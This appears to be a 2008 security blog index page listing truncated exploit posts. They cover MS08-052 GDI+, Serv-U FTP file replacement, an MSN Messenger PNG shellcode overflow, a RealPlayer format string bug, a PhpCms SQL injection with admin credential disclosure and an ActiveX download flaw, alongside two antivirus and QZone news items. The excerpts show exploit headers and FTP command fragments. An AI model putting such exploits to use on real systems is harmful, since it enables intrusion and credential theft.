-
2008-10-12
MS Windows GDI+ Proof of Concept (MS08-052) #2 - [exp'or'0day]
Operating System: XP SP2; Gdiplus.dll Version: 5.1.3102.2180; Credit: John Smith, Evil Fingers; GIF Template Reference: http://www.swe... -
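Microsoft Digital Image is an image management and processing tool.
The PicturePusher 'PipPPush.dll' ActiveX control it includes has a design flaw: a remote attacker can exploit the vulnerability to download files from an arbitrary location to the affected computer.
The control allows a custom POST request to be built for its upload functionality; using the browser as a proxy, the request can be bounced back, and a filename subfield can be injected through the AddString() method. A POST request of this kind looks like the following: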
POST /?aaaa=1 HTTP/1.1
Content-Type: multipa... -
2008-10-05
Serv-U 7.2.0.1 ftp file replacement - [exp'or'0day]
#user must have upload permissions
#
#(x) dmnt 2008-10-01
220 Serv-U FTP Server v7.2 ready...
user test
331 User name okay, need password.
pass test
230 User logged in, proceed.
rnfr any_exist_file.ext
350 F... -
2008-10-05
MSN Messenger PNG Image Buffer Overflow Download Shellcoded - [exp'or'0day]
/* * * MSN Messenger PNG Image Buffer Overflow Download Shellcoded Exploit * Bug discoveried by Core Security Technologies (www.coresecurity.com) * Exploit coded By ATmaCA * Copyright © 2002-2005 AtmacaSoft Inc. All Rights Reserved. * Web: http:/... -
/*
*****************************************************************************************************************
$ An open security advisory #13 - RealPlayer and Helix Player Remote Format String Exploit
********... -
2008-10-03
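New QZone version begins supporting the Firefox browser - [Security News]
Today I noticed that QQZone has started supporting Firefox; just a few days ago at a dinner I was still complaining that Tencent's products have always ignored Firefox. For quite a long time, Firefox users visiting QZone ran into strange behaviour such as the page freezing, and later Tencent simply redirected all Firefox visitors to the QQ Space RSS feed. Until today, when I finally saw this domain: new.qzone.qq.com.
I don't know whether this upgrade is the "Noble 5.0" version that the official announcement describes. But after looking it over, I feel that Tencent's products still have a "flavour of the rich and powerful"... -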
2008-10-03
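VB100 results announced: Kingsoft Antivirus takes a triple crown - [Security News]
PS: Chinese antivirus is gradually catching up with international standards
On September 27, the internationally authoritative virus research organization Virus Bulletin released the results of its latest VB100 test. As the only domestic antivirus software to pass the top-level certification 2 times in a row, Kingsoft Antivirus has once again taken home the world's top authoritative anti-virus certification.
It is understood that the September VB100 test used Microsoft's latest Windows Server 2008 as the test platform. Kingsoft Antivirus 2008, with a 100% detection rate and a 0% false-positive rate, fully identified all viruses on the WildList in both manual scanning and real-time monitoring modes,... -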
2008-10-03
PhpCms2007 sp6 SQL injection 0day - [exp'or'0day]
<? print_r(' -------------------------------------------------------------------------------- PhpCms2007 sp6 "digg" SQL injection/admin credentials disclosure exploit BY T00ls(www.T00ls.net) -------------------------------------------... -
2008-10-03
ESET System Analyzer Tool - [Network Attack and Defense]
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#define IMP_VOID __declspec(dllimport) VOID __stdcall
#define IMP_SYSCALL __declspec(dllimport) NTSTATUS __stdcall
#define OBJ_CASE_INSEN... -
2008-09-28
Exploit code for MS08052, the legendary strongest Microsoft vulnerability - [exp'or'0day]
MS Windows GDI+ .ico Remote Division By Zero Application: GDIPLUS.DLL Web Site: http://www.microsoft.com/ Platform: Windows * Bug: Division By Zero Tested agains: XP SP3 fully patched Note: This have nothing to do with http://milw0rm....













